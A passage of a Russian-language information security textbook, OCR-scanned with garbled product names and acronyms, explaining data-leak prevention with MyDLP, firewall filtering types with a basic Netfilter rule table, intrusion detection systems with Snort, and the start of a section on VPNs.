что данные клиента и договоры должны свободно проходить через нашу систему 
и быть доступными всем операторам группы технической поддержки. Однако если 
мы возьмем оператора сотовой связи, то большая часть договоров заключается 
лично, а это значит, что в случае пересылки большого массива документов такого 
типа система должна заблокировать это соединение и передать информацию ад¬ 
министратору системы. 

После классификации конфиденциальной информации необходимо установить 
возможные пути ее утечки. Как мы уже говорили, это могут быть внешние носите¬ 
ли, хищение носителей данных из организации, передача информации через сеть, 
печать информации, телефонные переговоры и т. д. 

Следующим этапом будет выбор нужного решения, и разумеется, выбирать мы 
будем исходя из полученных на предыдущем шаге данных. Например, если наши 
сотрудники перемещаются от офиса к офису, а конфиденциальная информация 
находится на их ноутбуках, то нам не подойдет система, не имеющая клиентских 
модулей. 

Поскольку целью нашей книги не является продвижение какого-либо коммерче¬ 
ского продукта, мы воздержимся от обзора текущего состояния рынка и рассмо¬ 
трим внедрение продукта с открытым исходным кодом. 

Хотим заметить, что в данный момент трудно найти хорошее решение с открытым 
исходным кодом для предотвращения утечки информации. На сегодняшний день 
эта ниша практически никем не занята, и, быть может, именно вы решите попробо¬ 
вать реализовать себя в этой среде. Сейчас мы хотим, чтобы у вас просто сложилось 
представление о работе систем такого типа. 

Для примера мы решили взять МуББР Это ПО поддерживается компанией 
Сопкхіо и имеет две версии — платную и бесплатную. 
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Итак, почему мы выбрали именно этот продукт? Во-первых, он бесплатный и рас¬ 
пространяется по лицензии ОКИ, что хоть как-то гарантирует то, что завтра ком¬ 
пания Сопккіо не заставит нас платить за использование ее продукта. Второе — это 
то, что МуВБР может защищать информацию как на устройствах пользователей, то 
есть имеет архитектуру «клиент-сервер», так и на серверах и во время ее передачи 
по сети. Третья причина — легкость в установке и эксплуатации. 

Используя МуВБР, вы сможете контролировать информацию, передающуюся 
всеми популярными путями — через электронную почту, веб-приложения, печать 
и копирование на внешние носители. 

Инсталляция данного продукта проходит без особых сложностей. Разработчики 
позаботились о нас и подготовили готовый образ, включающий в себя само ПО 
и все необходимые компоненты. Достаточно скачать, а дальше процесс установки 
ничем не отличается от инсталляции Каіі Біпих или Шпини. 


иЬипЬз® 
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Рис. 20.1. Инсталляции продукта из официального образа МуРЬР 

После инсталляции дальнейшее управление системой происходит через интуитив¬ 
но понятную веб-консоль. 

Теперь коснемся общих принципов внедрения ВБР. Большинство ВБР имеют 
три основных режима работы с данными — разрешить, предупредить и запретить. 
В самом начале работы, после инсталляции данной системы, мы настоятельно не 
рекомендуем использовать политики, запрещающие передачу информации. Все мы 
люди и можем ошибаться, особенно на начальном этапе внедрения любой систе¬ 
мы и особенно такой, как ВБР Ведь в случае ошибки можно парализовать работу 
целого предприятия. 
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Рис. 20.2. Панель управления МуЭІ-Р 


Теперь коснемся основных принципов работы данного ПО. МуПГР анализирует 
данные, передающиеся по разным каналам, в соответствии с заданными полити¬ 
ками. 

Политики — это набор правил, обеспечивающих реализацию разработанной ранее 
модели предотвращения утечки данных. 

Канал — среда передачи данных, в которой действуют политики. Например, веб¬ 
среда включает в себя такие протоколы, как РТР, НТТР и НТТР5. 

Источник — начальная точка, из которой мы ожидаем поступления информации. 
Это может быть вся сеть или отдельные хосты. В некоторых случаях может и не 
задаваться. 

Пункт назначения — конечная точка назначения сетевого трафика. В некоторых 
случаях может не задаваться. 

Типы информации — определяют критерии, по которым мы будем сортировать тра¬ 
фик в каком-либо канале. Му [)ГР имеет встроенный набор типов данных, однако 
администратор всегда может создать свой шаблон. 

После того как мы определились с основными понятиями, можно начинать созда¬ 
ние правил, по которым будет работать наша система. Итак, каждое правило будет 
состоять из канала, источника, пункта назначения, типа информации и действия. 
Действие определяет поведение ГО 8 по отношению к информации, подходящей под 
заданное правило. В бесплатной версии доступно три различных типа действия — 
разрешить, блокировать и запомнить. В последнем случае система позволит дан¬ 
ным пройти, но сделает пометку о происшедшем событии. 

В коммерческой версии есть две дополнительные опции — архивировать и отпра¬ 
вить в карантин. В обоих случаях информация будет сохранена на сервере и до¬ 
ступна администратору для дальнейшего анализа. 
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Рис. 20.3. Создание собственного шаблона 
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В принципе, мы рекомендуем начать внедрение с нескольких технически подко¬ 
ванных и морально устойчивых пользователей. Протестируйте новое решение на 
них, найдите и исправьте недостатки. 

Для тестирования политик, касающихся веб-трафика, весь поток данных придется 
перенаправить через ПГР-сериер, только тогда он сможет его проанализировать. 
Для этого настройте использование прокси-сервера на рабочих станциях, находя¬ 
щихся в тестовой группе. 

Для тестирования правил, касающихся, например, использования внешних но¬ 
сителей информации, вам надо будет проинсталлировать Му Г) БР-агент на все 
тестовые компьютеры. 

После успешной апробации системы в тестовой среде вы можете проинсталли¬ 
ровать агент на все рабочие станции организации и пустить весь сетевой трафик 
через ББР. Поначалу, как мы уже говорили, следует избегать запрещающих правил. 
Посмотрите, как работает система, соберите достаточно данных и только потом по¬ 
степенно, правило за правилом, начинайте применять ограничительные политики. 

На самом деле современные БЬР-системы умеют гораздо больше — они могут 
контролировать мобильные телефоны, данные, передающиеся через такое ПО, как 
8курс, защищают информацию в облаке и могут быть интегрированы с другими 
системами, обеспечивающими ИБ. В данный момент на рынке ИТ довольно мно¬ 
го поставщиков решений такого типа, но мало специалистов, умеющих грамотно 
настраивать и поддерживать такое ПО. Мы искренне надеемся, что вы пополните 
их ряды. 
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Брандмауэры, фаерволы, межсетевые экраны — как только эту технологию не 
называют. Они бывают как программными, так и аппаратными, бесплатными 
и платными, но все они должны выполнять одну основную функцию — отделение 
внешней сети от внутренней. Все остальное — это уже производные от данной 
функции. Брандмауэры находятся на границе двух сетей и представляют собой 
часть периметра, отгораживающего внутреннюю среду от внешней, практически 
как кожа у человека. 

Разумеется, нельзя полностью отгородиться от внешнего мира. Информация 
должна поступать извне, а пользователи не смогут нормально работать, если их 
полностью отрезать от сети Интернет. Фаервол контролирует потоки данных благо¬ 
даря набору определенных правил, он определяет, какая информация может уйти 
из внутренней сети во внешнюю, а какая — нет. Верно и обратное: он фильтрует 
информацию, поступающую из полной опасностей сети Интернет. Отключить фа¬ 
ервол — это как оставить человека без кожи: жить он будет, но очень скоро умрет 
от осложнений, вызванных вирусами и вредоносными микроорганизмами. Стоит 
заметить, что в крупных сетях устанавливают не один фаервол, каждый сегмент 
сети отграничен таким устройством. 

Еще одна немаловажная функция межсетевого экрана — это разграничение вну¬ 
тренней сети. Именно фаервол, на основе заданных политик, определяет уровень 
доступа различных пользователей к внутренним системам. Также он обеспечи¬ 
вает организацию демилитаризованной зоны. В ДМ3 находятся общедоступные 
серверы, например веб-сервер с размещенной домашней страницей предприятия. 
Доступ к ней должен быть у всех пользователей внешней сети, однако желательно 
логически отграничить такой сервер от сервисов, занимающихся обработкой кон¬ 
фиденциальных данных. 

Вы можете ни разу не столкнуться, например, с Ш5 или ІРЗ, но работа с фаерво¬ 
лом — основная обязанность каждого, кто имеет хоть какое-то отношение к систем¬ 
ному администрированию или информационной безопасности. 
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Рис. 21.1. Модель сети с фаерволом и разграничением на внутренние зоны 


Итак, мы определись с тем, что брандмауэр позволяет отгородить внешнюю сеть 
от внутренней, а значит, не дать злоумышленникам проникнуть в сеть. Однако 
бывают и такие ситуации, когда злоумышленник находится во внутренней среде, 
и в этом случае фаервол может стать еще одной преградой на пути утечки данных. 
Помните об этом и не давайте пользователям и администраторам больше прав, 
чем требуется. 

То же касается и доступа к внутренним ресурсам. Зачем службе технической под¬ 
держки пользователей иметь доступ к административной консоли фаервола или 
администратору баз данных — к системам мониторинга сетевого оборудования? 

Теперь поговорим о том, каким же образом фаерволы осуществляют фильтрацию 
трафика. Есть четыре основные технологии: 

□ пакетный фильтр; 

□ прокси; 

□ фильтр приложений; 

□ фильтр с отслеживанием соединений. 

В настоящее время они редко встречаются изолированно — современные устрой¬ 
ства комбинируют различные подходы и тем самым увеличивают степень защиты. 

Каждый фаервол работает на своем уровне модели ОЗІ. Ниже мы приведем табли¬ 
цу, в которой сопоставим тип фильтрации с уровнями данной модели. 
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Модель 051 с разными технологиями фильтрации 


Тип 

Уровень в модели 051 

Стек ТСР/ІР 

Фильтр приложений 

Прикладной уровень 

НТТР, 5МТР, РТР и т. д. 


Уровень представления 

55Б, ТБ8, ХБК 


Сеансовый уровень 

ТСР — начало сессии 

Фильтр с отслеживанием 
соединений 

Транспортный уровень 

ТСР, ІЮР и т. д. 

Пакетный фильтр 

Сетевой уровень 

ІР, ІСМР, ІРЗес, АКР и т. д. 

Фаерволы МАС-уровня 

Канальный уровень 



Физический уровень 



Фаерволы с пакетной фильтрацией обрабатывают потоки данных, используя такие 
параметры, как адрес отправителя, адрес получателя, порт отправителя и получате¬ 
ля, время, тип сервиса и прочие параметры, которые могут находиться в заголовке 
ІР-пакета. 

На роутерах и свичах, в принципе, тоже существует пакетная фильтрация, но на¬ 
зывается она иначе — списки контроля доступа (Ассезз Сопі гоІ Ьізіз). 

Из плюсов данных фильтров, прежде всего, хочется отметить их простоту. Такие 
фильтры встроены в самое разное ПО, и даже маломощный домашний роутер имеет 
в наши дни такой фаервол. 

Второе достоинство — скорость. Использование данного типа фильтрации прак¬ 
тически не влияет на загруженность системных ресурсов. И наконец, скорость, 
доступность и простота настройки делают такой тип фаерволов идеальным 
в случае, когда вам надо оперативно отграничить какой-либо участок сети или 
быстро развернуть новую подсеть с соблюдением базовых принципов политики 
безопасности. 

Однако у данной технологии есть один большой минус. Во время такой фильтрации 
не анализируется содержимое передаваемых данных. Как вы знаете, закрепление 
определенных портов за различными сервисами весьма условно. Никто не поме¬ 
шает нам развернуть веб-сервер на порте 456, и при этом все будет великолепно 
работать! Именно этим и пользуются злоумышленники. 

В одной из предыдущих глав мы уже писали про туннелирование. Так вот, именно 
этот недостаток подобных фаерволов позволяет туннелировать любой трафик 
через, например, порт 80. Разработчики пиринговых сетей давно это поняли 
и осуществляют связь именно через этот порт. Также отсутствие контроля содер¬ 
жимого может привести к тому, что злоумышленники получат возможность бес¬ 
препятственно отправлять в вашу сеть специально созданные пакеты, содержащие 
вредоносный код. 
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Однако это не повод отказываться от данного типа фильтрации. Безопасность 
нельзя обеспечить, используя лишь одну какую-нибудь технологию, ведь каждая 
из них имеет свои недостатки. Однако, используя несколько компонентов, можно 
собрать вполне хорошую систему защиты. 

Фильтры приложений, или прокси-фаерволы. Работают на седьмом, самом верх¬ 
нем уровне модели 051. Такие устройства, действуя незаметно для пользователя, 
работают с внешним миром от его имени, не давая сделать это напрямую. 

Приведем небольшой пример. Пользователь вводит в адресной строке браузера, 
например, уапсіех.пі и нажимает клавишу «Іліі ег». Запрос отправляется на фаервол, 
затем фаервол, запомнив клиента, открывает соединение с уаткіех.пі и получает 
определенную информацию. Далее эта информация анализируется и затем пере¬ 
дается пользователю. 

К плюсам данной технологии можно отнести дополнительный буфер. После того 
как информация была получена из внешнего мира, а это не обязательно иниции¬ 
ровано пользователем, находящимся во внутренней сети, она помещается в буфер. 
Даже банальные запросы, идущие от злоумышленника при сканировании портов, 
будут помещены в буфер и проанализированы. 

Благодаря такому буферу и анализу информации можно оперативно закрывать 
бреши в безопасности, например, веб-приложений. Ведь порой, чтобы устранить 
уязвимость, программистам требуется достаточно много времени, а фаервол по¬ 
зволяет устранить эту проблему в считанные минуты. 

Однако и у данной технологии есть свои недостатки. Потребность в организации 
буфера и сканировании делает такой фаервол достаточно требовательным к систем¬ 
ным ресурсам, и даже при их наличии время обработки информации существенно 
возрастает. 

Второй минус — сами приложения. В современном мире мы сталкиваемся с огром¬ 
ным количеством веб-приложений. Многие из них типовые и построены по одному 
и тому же принципу, с ними проблем нет. А вот со специфическим ПО проблемы 
обязательно возникнут. Вы потратите не один день, пытаясь настроить фаервол 
так, чтобы нужное вам приложение работало корректно. 

Фаерволы, работающие в режиме обратного прокси. Работают по такому же 
принципу, что и обычные прокси-фаерволы, однако в данном случае они защищают 
не клиента, а внутренний сервер, к которому обращается клиент из внешней сети. 
Такие фаерволы могут работать также в качестве балансировщика нагрузки, рас¬ 
пределяя запросы между несколькими серверами. 

Такой прокси позволяет эффективно защищать внутренние серверы от внешних 
угроз. Однако отвечающему за такой фаервол администратору необходимо четко 
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представлять себе работу приложения, которое он защищает. Например, в апплика¬ 
ции, находящейся под нашей защитой, есть форма для ввода данных. Как мы знаем, 
такие формы достаточно чувствительны к вводимой информации, а допущенные 
программистами ошибки могут привести к тому, что злоумышленник успешно про¬ 
ведет атаку, направленную на переполнение буфера. Как бы банальна ни была эта 
ситуация, но проходящие по этому вектору атаки взломы до сих пор происходят, 
и притом довольно часто. 

Мы, как грамотные ИБ-специалисты, должны предотвращать саму возможность 
возникновения данной ситуации еще на уровне фаервола. Однако такой подход до¬ 
статочно трудоемок. Мы должны постоянно следить за изменениями приложения 
и приспосабливать под них наш фаервол. 

Второе преимущество данного подхода — возможность дешифровки зашифро¬ 
ванной информации. Сейчас многие веб-сайты внедряют использование 55Б- 
сертификатов, что позволяет шифровать данные между пользователем и конечным 
сервером. В нашем случае, если не будет установлен реверс прокси, мы не сможем 
проверять информацию, приходящую из внешней среды, ведь она будет в зашиф¬ 
рованном виде. Также дешифрация трафика на уровне прокси позволяет не только 
проверять получаемые данные, но и снизить нагрузку на конечный сервер, пере¬ 
давая ему информацию в дешифрованном виде. 

Фильтр с отслеживанием соединения анализирует информацию о сессии между 
устройствами. Фаервол хранит информацию о каждой текущей сессии, а вместе 
с ней такие данные, как адрес отправителя и получателя, задействованные порты, 
номер пакета в последовательности, контрольную сумму, а также специфичную для 
отдельных протоколов информацию, например набор команд и ответов в случае 
использования РТР или 5МТР. 

Типичная сессия начинается с запроса на соединение от определенного клиента 
к конкретной системе. Сначала все работает так же, как и в случае с обычным 
пакетным фильтром. Фаервол проверяет набор правил и на их основании разре¬ 
шает или запрещает соединение. Далее, если есть разрешающее правило, фаервол 
разрешит соединение и сделает запись о нем в своей базе данных. В последующем 
каждый пакет будет проверяться на принадлежность к той или иной открытой 
сессии. Если соответствие пакета и сессии не будет установлено, то такой пакет 
не сможет пройти во внутреннюю сеть. После окончания сессии запись о ней 
стирается. 

Помните, что фаерволы могут работать, исходя из двух принципов: все, что не раз¬ 
решено, — запрещено и все, что не запрещено, — разрешено. Для нас как для ИБ- 
специалистов важно, чтобы фаервол был сконфигурирован на основании первого 
принципа. При данном подходе нагрузка на администратора, конечно, увеличится, 
зато не будет нанесен урон безопасности. 
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Для того чтобы обезопасить себя, всегда требуйте от пользователей докумен¬ 
тального подтверждения необходимости открытия какого-либо доступа, не 
обязательно бумажного, — многие компании используют электронную систему 
документооборота. 

Помните, что у большинства правил есть срок действия. Если пользователю нужен 
доступ к какому-либо ресурсу на время тестов, то будет целесообразно по оконча¬ 
нии тестов этот доступ закрыть. 

Для предотвращения типичных ошибок ниже мы приведем пример базовой кон¬ 
фигурации фаервола, а после этого дадим некоторые пояснения. 


Базовый набор правил для №ШИ:ег 


№ 

Источник 

Пункт на¬ 
значения 

Сервис 

Интер¬ 

фейс 

Направ¬ 

ление 

Действие 

0 

Фаервол 

Своя сеть 

Любой 

Любой 

Внешний 

Внутрь 

Запретить 

1 

Любой 

Любой 

Любой 

Обратная 

петля 

Все 

Разрешить 

2 

Администратор 

Фаервол 

55Н 

Любой 

Все 

Разрешить 

3 

Фаервол 

ВИЗ-сервер 

ВЫЗ 

Любой 

Все 

Разрешить 

4 

Любой 

Фаервол 

Любой 

Любой 

Все 

Запретить 

5 

Своя сеть 

Любой 

Любой 

Любой 

Все 

Разрешить 

6 

Любой 

Любой 

Любой 

Любой 

Все 

Запретить 


0. Антиспуфинговое правило. Спуфинг — это генерация пакетов с поддельным 
адресом отправителя. Основная идея этого правила — проверять адрес отпра¬ 
вителя всех пакетов, приходящих из внешнего мира на внешний интерфейс фа¬ 
ервола. Если будет обнаружено несоответствие данному правилу, то соединение 
будет разорвано. 

1. Разрешаем все соединения на интерфейс обратной связи. Это необходимо для 
корректной работы самого устройства. 

2. Разрешаем всем компьютерам, состоящим в группе «Администратор», подклю¬ 
чение к фаерфолу с использованием 881 [-протокола. 

3. Разрешаем фаерволу подключаться к ЭКЗ-серверу. Это также необходимо для 
нормальной работы устройства. 

4. Запрещаем кому-либо еще подключаться к фаерволу. 

5. Разрешаем доступ из внутренней сети ко всем ресурсам. 

6. Запрещаем все, что не разрешено. 
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Несколько примечаний к данной конфигурации: 

□ Анализ пакетов происходит от первого правила к последнему, сверху вниз. Это 
значит, что если в первом правиле вы разрешаете доступ к каким-либо ресурсам, 
например, для группы компьютеров, а во втором правиле запрещаете доступ 
к тем же ресурсам отдельным рабочим станциям, состоящим в этой группе, то 
доступ у них все равно будет. 

□ Конфигурация предназначена для ИеШКег — брандмауэра, встроенного в ядро 
ОС Ьіішх. Поэтому на устройствах других производителей она может выглядеть 
немного иначе, но идея будет та же. 

□ Пятое правило дает слишком широкий доступ компьютерам внутренней сети. 
По идее, его необходимо заменить набором правил, каждое из которых обеспе¬ 
чивало бы минимально необходимый доступ. 




Системы обнаружения 
вторжения (Ю5) 


Ни для кого не секрет, что количество направленных на проникновение атак рас¬ 
тет с каждым днем. По большей части это связано не с появлением на рынке труда 
значительного количества ИБ-специалистов, а скорее с широким проникновением 
ИТ в нашу жизнь. Сейчас каждый более или менее грамотный школьник имеет 
представление о работе глобальной сети, а инструментов для взлома информаци¬ 
онных систем становится все больше. Более того, многие из них абсолютно бес¬ 
платны и не требуют от обладателя навыков использования и глубоких познаний. 
Людей, бездумно использующих эти инструменты, так и называют — скрипт-кидди 
(зсгірі кісісііе). Вы можете возразить, что на страже сети всегда стоит фаервол, но 
будем честны: эта система защиты данных, как и все прочие, не лишена недостатков 
и в одиночку не может гарантировать полной защиты. 

Давайте проведем параллель с реальной жизнью. Представьте себе, что вы ку¬ 
пили новую квартиру. И естественно, вы не захотите перевозить туда мебель, 
доставшуюся вам еще от бабушки. Вместе с новой мебелью вы, как и каждый ува¬ 
жающий себя ИТ-профессионал, поставите на самом видном месте свой новый 
компьютер, цена которого равняется вашему заработку за последние несколько 
месяцев. Обустроив новое жилье, вы захотите его обезопасить и, конечно же, за¬ 
кажете самую надежную дверь. В данном примере она и олицетворяет фаервол. 
Но однажды, вернувшись с работы, вы обнаружили, что воры проникли в квар¬ 
тиру через окно и вынесли все, включая новый компьютер. Вы даже не могли 
себе представить такое развитие событий, ведь ваши апартаменты находятся на 
шестнадцатом этаже. Так же случается и в ИТ. Ваша сеть всегда находится под 
угрозой. Злоумышленники, как и вы, регулярно просматривают базы данных 
уязвимостей и ищут пути проникновения в вашу сеть. Иногда эти пути могут 
быть настолько непредсказуемыми, что вы просто не можете себе такого пред¬ 
ставить. В этом примере Ш5 можно сравнить с сигнализацией. Конечно, она не 
сможет гарантировать стопроцентной защиты, однако позволит существенно 
минимизировать риски и возможные убытки. 

Итак, мы подходим к главному — что же представляет собой Ш5 в мире ИТ? ГО5 
позволяют обнаруживать атаки и предотвращать их дальнейшее развитие. 
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Конечный результат достигается благодаря сбору и анализу данных из различных 
источников. Эффективная работа ГО5 обеспечивается благодаря следующим тех¬ 
нологиям: 

□ Мониторинг и анализ активности пользователей и систем. Обычно осущест¬ 
вляется путем соответствия потоков данных определенному набору правил. 
Используемые в Ш5 правила представляют собой описание наиболее популяр¬ 
ных векторов атак. Однако даже небольшое изменение в ходе проведения атаки 
позволяет злоумышленнику обойти данный фильтр. 

□ Проверка конфигураций и поиск уязвимости ИС. 

□ Проверка целостности критических данных. 

□ Статистический анализ потоков данных, основанный на математических мо¬ 
делях известных атак. Для них не важна последовательность событий, что за¬ 
трудняет обход такой системы. Однако злоумышленники могут обучить такие 
системы воспринимать вредоносный трафик как нормальный. 

□ Определение подозрительных действий. 

□ Использование нейронных сетей для выявления атак. Позволяет избавиться 
от недостатков статистических методов и статических правил. Обычно внача¬ 
ле нейронные сети обучают распознавать именно нормальный трафик, но они 
также могут обучаться и на атаках злоумышленников. 

В наше время трудно встретить ГО5, в которой был бы реализован только один 
подход для анализа данных, — современные системы используют несколько тех¬ 
нологий одновременно. 

ГО8 различаются между собой не только способами обработки данных, но и спо¬ 
собами реагирования на какое-либо происшествие. Хотя это деление также доста¬ 
точно условно. Выделяют пассивные системы, только предупреждающие о проис¬ 
шедшем инциденте, и активные, пытающиеся противодействовать атаке, например, 
меняя конфигурацию фаервола или маршрутизатора. 

Как и любая система, ГО5 состоит из набора связанных между собой компонентов. 
Для лучшего понимания дальнейшего материала разберем основные составляющие 
части ГО5: 

□ Модуль слежения, или сенсор, обеспечивает слежение за потоком данных. Он 
может быть физически отделенным от основной системы и находиться на любом 
хосте в любом сегменте сети. 

□ Система обнаружения атаки является основным модулем системы. Осуществля¬ 
ет анализ информации, полученной из различных источников, и, на основании 
полученных результатов и заданных правил, принимает решение о дальнейшем 
действии. 

□ База знаний содержит информацию, на основе которой анализируется трафик. 
Это могут быть и профили поведения пользователей, и сигнатуры известных 
атак, и различные статистические данные. 
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□ База данных хранит всю остальную информацию, не относящуюся к базе зна¬ 
ний, например журналы событий, конфигурацию сервиса и т. д. 

□ Система управления — обычно графический интерфейс, позволяющий управ¬ 
лять всеми компонентами 11)8. 

□ Система реагирования осуществляет реагирование на обнаруженные атаки 
и другие события. 

Исходя из метода сбора информации, ШЗ можно условно разделить на следующие 
подтипы. 

□ Сетевые Ю8 (N108) — как правило, находятся на границе двух сетей. Они 
анализируют проходящий через них сетевой трафик и сравнивают его со своей 
базой данных известных атак. В случае обнаружения атаки или подозрительного 
трафика отправляют сообщение администратору. 

□ ГО8 отдельного узла (NN108) — анализируют сетевой трафик, который прихо¬ 
дит на какой-либо конкретный сервер. В отличие от предыдущего компонента, 
анализирующего весь трафик, проходящий в определенную подсеть, эти систе¬ 
мы проверяют данные, которые приходят на один конкретный хост. 

□ ГО8 хоста (НГО8) — устанавливаются на конкретный хост в сети. Они запоми¬ 
нают первичное состояние критичных файлов, а затем сравнивают их текущее 
состояние с эталонным. В случае, если система находит отличие, она оповещает 
об этом администратора. 

Заметим, что данная классификация достаточно условна. Современные системы 
обеспечивают сбор данных сразу из нескольких источников. 

Теперь, когда мы поняли, как работает ШЗ и разобрались с основными ее компо¬ 
нентами, настало время узнать о достоинствах и недостатках таких систем. 

Начнем с хорошего, с плюсов. Чем же может нам помочь такая система? Итак, 
ШЗ может определить недостатки конфигурации ИС, найти хорошо известные 
уязвимости в установленном ПО, определить начало атаки на вашу сеть, а также 
анализировать активность пользователей сети и отслеживать изменения в крити¬ 
ческих данных. 

Однако данная система, как и другие, не лишена своих недостатков. Вот лишь 
некоторые из них: она не может предотвратить атаку, использующую уязвимости 
в сетевых протоколах, теряет эффективность при больших нагрузках на сеть, не 
всегда может правильно анализировать данные от специфичных или нестандарт¬ 
ных ИС, ее эффективность снижается в случае атак на пакетном уровне, она не 
сможет определить причину происшедшего проникновения в автоматическом 
режиме. 

Несмотря на присущие ей недостатки, такая система все равно может дать нам 
очень многое. Но для ее эффективной работы необходима правильная установка 
ШЗ в существующей инфраструктуре. 
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Ниже мы приведем список точек, где установка Ш5 считается наиболее целесо¬ 
образной: 

□ между вашей и глобальной сетью; 

□ между [)М / и фаерволом; 

□ в удаленных офисах; 

□ между пользователями и внутренними серверами. 



Небольшое замечание по данной схеме: разные авторы предлагают размещать один 
из сенсоров по-разному. Речь идет о расположенном на границе с глобальной сетью. 
Если данный сенсор разместить до фаервола, то мы можем получить огромное ко¬ 
личество срабатываний и не сможем анализировать зашифрованный трафик. Также 
мы уже упоминали, что на большом потоке данных эффективность 108 снижается. 
Мы склоняемся к тому, чтобы размещать 108 после фаервола. 

После того как вы правильно расположите все сенсоры, необходимо сделать так, 
чтобы все данные отправлялись на единую консоль управления. 

Мы не будем заострять ваше внимание на процессе выбора и установки 108. Од¬ 
нако рекомендуем обратить внимание на ЗпоИ. Это довольно популярная ГО5, 
которая также может работать в режиме предотвращения атак (ІР5). Для 8погі 
существует огромное количество документации. Также, что немаловажно, эта 
система до сих пор активно поддерживается и развивается. В 8погі: есть возмож¬ 
ность написания своих правил, однако на официальном сайте, а также на просторах 
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Всемирной паутины вы найдете множество готовых и эффективно работающих 
политик. 

8погі: можно использовать как N105, но он также поддерживает архитектуру кли¬ 
ент-сервер, а это означает, что вы можете сконфигурировать один сервер, который 
будет собирать данные с сенсоров и анализировать их. 

Еще одно преимущество данного продукта в том, что он может работать совместно 
с другим ПО. Советуем обратить ваше внимание на ВА5Е. Этот графический ин¬ 
терфейс для Зпоіі помогает решить одну из главных проблем ИБ — он позволяет 
представлять информацию в удобном графическом виде, что облегчает ее анализ 
и понимание. 

РиІІесІРогк — скрипт, написанный на языке программирования Регі. Позволяет ска¬ 
чивать, комбинировать и обновлять правила для ЗпогГ из различных источников. 

Также не забывайте, что ЗпогГ может быть интегрирован с базой данных ІѴІуЗОГ. 
Это поможет расширить возможности и улучшить производительность системы 
в целом. 

Несмотря на популярность и отличную работу Ш5, не спешите их внедрять. По¬ 
сле принятия решения об установке такой системы необходимо детально изучить 
логическую схему сети и понять, где разместить сервер, куда установить сетевые 
сенсоры и какие хосты нуждаются в установке НШ5. 

Неправильное размещение компонентов системы может привести не только к боль¬ 
шому количеству ложных срабатываний, но и к невозможности анализа трафика 
в принципе. 

Внимательно проанализируйте риски. Исходя из полученной информации, вы 
поймете, какие данные надо собирать и анализировать. Машины пользователей 
будут больше подвержены таким рискам, как заражение вирусом, тогда как серверы 
веб-приложений стоит защищать, например, от 8 О Г-инъекций. 

В сетях с высоким количеством трафика необходимо уделить внимание произво¬ 
дительности. Несомненно, если вы не испытываете недостатка в вычислительных 
ресурсах, проблема производительности не будет такой критичной, однако мы 
выступаем за рациональное использование ресурсов. 

Как и в случае с внедрением ОБР, не стремитесь активно использовать все доступ¬ 
ные правила и весь арсенал средств, направленных на предотвращение атак. Это 
чревато тем, что вы парализуете работу всей сети. Начинайте внедрять постепенно, 
для начала только в режиме мониторинга. И лишь потом, после сбора достаточного 
количества данных о работе системы, можете начинать действовать более активно! 
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Несмотря на все попытки контролирующих органов, в современном мире ИТ 
давно уже отсутствуют какие-либо границы. Считается нормальным, что над 
разработкой какого-либо ПО с открытым кодом трудятся тысячи специалистов 
со всего света. 

Однако данная тенденция присуща не только открытым сообществам — бизнесме¬ 
ны уже давно поняли всю прелесть удаленной работы. Для работающего из дома 
сотрудника не придется покупать дорогую офисную мебель и приводить рабочее 
помещение в соответствие всем нормам безопасности труда, да и вообще отпадает 
необходимость аренды помещения. А если компании повезло, то она может найти 
отличного специалиста из другой страны, который за ту же работу попросит в два, 
а то и в три раза меньшую зарплату. Такая экономия средств позволяет компаниям 
бурно развиваться, нанимать новых сотрудников и открывать свои представитель¬ 
ства в разных городах. 

Однако развитие в этом направлении привело к появлению другой проблемы. За¬ 
щита сети, находящейся в пределах одного здания, не представляет собой особых 
сложностей. А теперь представьте, что руководство вашей компании, головной 
офис которой находится в Москве, решило открыть свое представительство в Но¬ 
восибирске. И вам, как ИТ-специалисту, необходимо обеспечить филиалу доступ 
ко всем внутренним информационным ресурсам, находящимся в вашей сети. 

Когда-то давно существовала практика протягивания выделенной линии до уда¬ 
ленных офисов, однако из-за дороговизны и плохой масштабируемости от нее 
отказались. В наши дни связь между удаленными офисами осуществляется через 
глобальную сеть. Это позволяет сократить расходы на выделенные линии и ис¬ 
пользовать для связи с удаленными сотрудниками недорогую инфраструктуру 
местных интернет-провайдеров. 
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Однако при таком подходе мы сталкиваемся с двумя другими проблемами. Первая 
касается маршрутизации. Обычно внутренние ИС компании не имеют доступа 
в Интернет, а маршрутизация во внутренней сети осуществляется при помощи не- 
маршрутизируемых в глобальной сети ІР-адресов. Вторая проблема — безопасность 
данных. Вся информация передается по открытым, незащищенным каналам. При 
таком способе ее передачи невозможно обеспечить ни физическую, ни логическую 
безопасность канала. 

Для решения этих проблем и была создана технология виртуальных частных сетей 
(ѴРМ). Благодаря этой технологии появилась возможность защитить информацию, 
которая передается по открытым каналам, и объединить географически разделен¬ 
ные компьютеры и локальные сети в единую среду передачи данных. 

Виртуальные частные сети организуются благодаря построению виртуальных кана¬ 
лов связи, ѴРІЧ-туннелей, на базе глобальной сети. В таких туннелях информация 
передается исключительно в зашифрованном виде. 


Компоненты виртуальной частной сети 

Виртуальная частная сеть состоит из следующих компонентов: 

□ ѴРІчІ-клиент; 

□ ѴРК'-серііср; 

□ ѴР1ч[-шлюз; 

□ среда передачи данных. 

В качестве ѴР\'-клиеита может выступать множество устройств. Это могут быть 
персональные компьютеры пользователей, мобильные телефоны, шлюзы других 
сетей и т. д. Обычно именно ѴРМ-клиент инициализирует установление безопас¬ 
ного соединения. В качестве компонента, обеспечивающего связь с удаленным 
сервером, может выступать ПО, установленное на рабочей станции пользователя, 
либо отдельное устройство. В наши дни даже у роутеров, предназначенных для 
домашнего использования, есть встроенный ѴРМ-клиент. 

Данная часть системы является самым ненадежным ее компонентом, а вы, конеч¬ 
но, помните, что максимальная прочность цепи равна прочности самого слабого 
ее звена. Администраторы сети должны контролировать такие удаленные хосты 
с особым рвением, к ним необходимо предъявлять даже более строгие требования, 
чем к компьютерам локальной сети. На удаленных компьютерах обязательно дол¬ 
жен быть установлен антивирус, локальный фаервол, ПО, позволяющее удаленно 
администрировать данный компьютер, и Ш5 (если централизованно используется 
компанией). 

ѴРМ-серверы некоторых компаний поддерживают технологию проверки клиента 
на соответствие политикам безопасности. Если, скажем, на компьютере пользовате- 
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ля присутствует антивирус, сигнатуры которого не обновлялись в течение послед¬ 
них 24 часов, то такому пользователю может быть отказано в подключении к сети. 

УРИ-сервер, как следует из названия, — это сервер, к которому подключается кли¬ 
ент. Как правило, это отдельный хост в сети, который может аутентифицировать 
клиента и предоставить ему доступ к своим ресурсам. Как и в случае с клиентом, 
на стороне сервера можно организовать УРИ-туннель при помощи аппаратного 
или программного решения. 

УРИ-шлюз отличается от сервера тем, что предоставляет клиентам доступ к мно¬ 
